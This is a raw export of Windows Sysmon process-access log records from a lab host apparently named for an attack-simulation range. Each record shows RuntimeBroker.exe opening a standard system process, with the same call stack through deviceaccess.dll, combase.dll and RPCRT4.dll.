12:02:30.418{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006626Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.418{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D2-6064-B500-00000000AE01}5416C:\Windows\system32\DllHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006625Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.418{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C8-6064-AB00-00000000AE01}5080C:\Windows\system32\rundll32.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006624Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.418{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006623Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.418{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C4-6064-A200-00000000AE01}3108C:\Windows\system32\userinit.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006622Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.418{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C4-6064-9D00-00000000AE01}5112C:\Windows\system32\svchost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006621Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.402{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C3-6064-9A00-00000000AE01}3164C:\Windows\System32\rdpclip.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006620Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.402{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-6497-6064-8300-00000000AE01}4472C:\Windows\system32\conhost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006619Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.402{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-6497-6064-8200-00000000AE01}4432C:\Windows\system32\WinrsHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006618Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.402{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006617Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.402{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006616Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.402{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D2-6064-B500-00000000AE01}5416C:\Windows\system32\DllHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006615Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.402{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C8-6064-AB00-00000000AE01}5080C:\Windows\system32\rundll32.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006614Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.402{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006613Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.402{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C4-6064-A200-00000000AE01}3108C:\Windows\system32\userinit.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006612Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.402{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C4-6064-9D00-00000000AE01}5112C:\Windows\system32\svchost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006611Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.402{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C3-6064-9A00-00000000AE01}3164C:\Windows\System32\rdpclip.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006610Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.402{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-6497-6064-8300-00000000AE01}4472C:\Windows\system32\conhost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006609Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.402{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-6497-6064-8200-00000000AE01}4432C:\Windows\system32\WinrsHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006608Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.402{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006607Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
